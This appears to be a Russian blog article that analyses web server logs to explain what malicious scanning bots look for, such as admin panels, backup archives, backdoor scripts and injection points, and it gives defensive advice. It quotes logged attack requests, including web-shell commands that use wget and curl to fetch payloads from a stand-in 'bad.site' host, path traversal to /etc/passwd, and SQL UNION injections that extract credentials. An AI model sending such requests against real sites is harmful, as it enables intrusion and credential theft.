[Из песочницы] Что и зачем ищут на сайтах «боты тёмной стороны силы»
Что такое — «боты тёмной стороны силы»? Обозначим так сканирующие программы (поисковые роботы, пауки), которые используют злоумышленники. В отличие от роботов поисковых систем [1, 2], «боты тёмной стороны силы» (в дальнейшем для краткости — боты) заняты поиском уязвимостей, вредоносных программных закладок, конфиденциальной информации и т. д. Действия, аналогичные работе бота, может выполнять и человек, но использование бота, по понятным причинам, эффективнее и более распространено.При подготовке материала использованы журналы (веб-серверов и систем управления контентом) нескольких сайтов. Выбраны наиболее типичные и наиболее наглядные примеры.Что же и зачем ищут?
Административная панельАдминистративная панель, панель управления или «админка» — одна из самых распространенных целей. Задачи: определить используемую CMS, установить точный адрес скрипта панели для дальнейшего подбора пароля.Примеры (для CMS WordPress [3]):
example.org/wp-login.php (проверка «в лоб»)example.org/wp-admin/ (перебираются типовые каталоги)example.org/dir/dir/wp-login.php (перебираются все доступные каталоги)example.org/wp-admin/images/wordpress-logo.png (попытка маскировки сканирования, когда проверяется не сам скрипт, а характерное изображение или css файл)
Подобное сканирование ведется постоянно и не должно вас сильно тревожить, особенно если вы не используете CMS WordPress, как в приведенном примере. В качестве меры противодействия целесообразно ограничить доступ к каталогу со скриптами административной панели средствами веб-сервера (.htaccess и .htpasswd для Apache), не забывая про обязательную стойкость паролей в используемой CMS.
Дополнительные примеры
Как видно из этих примеров, осуществляются попытки найти не только административные панели CMS, но и вспомогательных систем или приложений для администрирования. Перебираются различные варианты названий скриптов и каталогов, включая наиболее распространенные суффиксы версий. Некоторые администраторы считают, что изменив имя скрипта или каталога (сохранив при этом читаемость и понятность названия), они смогут перехитрить ботов и защитить систему. К сожалению, это далеко не так.Архивы с характерными именами Архивы с резервными копиями или установочными пакетами — ценная добыча для злоумышленников, т. к. в них могут содержаться пароли доступа к административной панели, файлы с настройками, параметры доступа к СУБД, полные копии баз данных и др.Примеры:
example.org/example.org.tar.gzexample.org/backup.zipexample.org/example.org.zipexample.org/public_html.tar.gzexample.org/public_html.zipexample.org/www.zipexample.org/dir/dir.zip
Обратите внимание, что многие архиваторы, в т.ч. установленные на серверах хостинговых компаний, задают по-умолчанию имя файла-архива равным каталогу который архивируется или в котором расположены данные, предназначенные для архивирования. Эта особенность широко используется ботами, как видно из примеров выше.Иногда можно встретить попытки подбора имен файлов-архивов от распространенных систем резервного копирования. При использовании типового алгоритма формирования имен файлов и дат выпуска обновлений количество комбинаций значительно сокращается. Несмотря на наличие у некоторых систем резервного копирования сайтов встроенных механизмов защиты (таких как .htaccess с «deny from all»), они могут оказаться не эффективны при изменении веб-сервера и по некоторым другим причинам.
Целесообразно оперативно удалять файлы с архивами, которые содержат важную или конфиденциальную информацию, т. к. они постоянно находятся в области интересов ботов.
Ловушки При выявлении подозрительных обращений в процессе анализа журналов у администратора возникает желание глубже разобраться в ситуации. На это и ориентируются злоумышленники.Из журналов, как правило, возможно восстановить значение поля HTTP referer. Данное поле клиент (бот) может устанавливать произвольно, поэтому администратор должен проявлять определенную осторожность при обращении с полученными данными. Возможные варианты: ссылка на фишинговый сайт или сайт с вредоносным ПО, рекламная ссылка, выполнение скрипта, сжатого системой сокращения ссылок.
Лучше не рассматривать значение поля HTTP referer как достоверную информацию и, если перейти по ссылке очень хочется, предварительно проверить ссылку на сайтах антивирусных компаний и VirusTotoal.
Все это должны знать и понимать, но напомним, что переходить по неизвестным ссылкам категорически запрещено, особенно когда вы работаете на сервере с привилегиями администратора.Примеры ссылок, по понятным причинам, приводить не будем.
«Волшебные» каталоги Какие каталоги (подразделы) используются ботами чаще всего? Приведем примеры без дополнительных комментариев, ориентируясь только на относительную частоту. Следует сразу оговориться, что выборка зависит от обследованных сайтов и включения (исключения) каталогов, используемых для поиска административных панелей.«Волшебные» каталоги
Вредоносные программные закладки Вначале рассмотрим примеры: example.org/explore.phpexample.org/images/join.phpexample.org/images/register.phpexample.org/images/signup.phpexample.org/images/stories/busuk.inc.phpexample.org/images/webadmin.phpexample.org/libraries/libraries.phpexample.org/stories/food.phpexample.org/tmp/petx.phpexample.org/xmlrpc.php
Перечисленные выше файлы не должны присутствовать на [исследуемых] сайтах. Если у вас достаточно большая выборка с нескольких площадок, то можно выделить подобные целенаправленные попытки. Обратите внимание на дополнительные примеры, иллюстрирующие использование подобных скриптов злоумышленниками:
example.org/images/do.php? act=regexample.org/images/stories/racrew.php? cmd=wget http://bad.site/img/icons/tempe.gif; mv tempe.gif menu.phpexample.org/naskleng.php? cmd=wget http://bad.site/components/com_content/teli.tar.gz; curl -O http://bad.site/components/com_content/teli.tar.gz; lwp-download http://bad.site…
Откуда они берутся? Как правило, всё банально: варез или взлом (через устаревшие и не обновленные вовремя CMS или компоненты и др.).
Нестареющая классика — SQL injection и переходы по каталогам Ограничимся примерами без подробных рассуждений что это и как должно работать, по замыслу авторов.классика example.org/index.php? option=…/…/…/…/…/…/…/…/…/…/etc/passwd\0&sitemap=1example.org/index.php? option=/…/…/…/…/…/…/…/…/…/…/proc/self/environ&sitemap=1example.org/index.php? option=com_ignitegallery&task=view&gallery=-1+union+select+1,2, concat (1234,0×3B,4321),4,5,6,7,8,9,10--example.org/index.php? option=com_kunena&func=userlist&search=\»%» and 1=2) union select 1, concat (username,0×3a, password,0×3a, usertype), concat (username,0×3a, password,0×3a, usertype), «Super Administrator», «email», …example.org/index.php? option=com_linx&Itemid=101«and (select/**/1/**/from (select/**/count (*), concat ((select/**/username/**/from/**/jos_users/**/where/**/usertype=0×73757065722061646d696e6973747261746f72…example.org/index.php? option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,234567--example.org/index.php/? option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1, concat (0×7e, table_name,0×7e)+from+information_schema.tables+where+table_name=0×4348415241435445525f53455453-- Вместо заключения Смотрите и анализируйте журналы эксплуатируемых систем (не только web). Это может пригодится в самый неподходящий момент.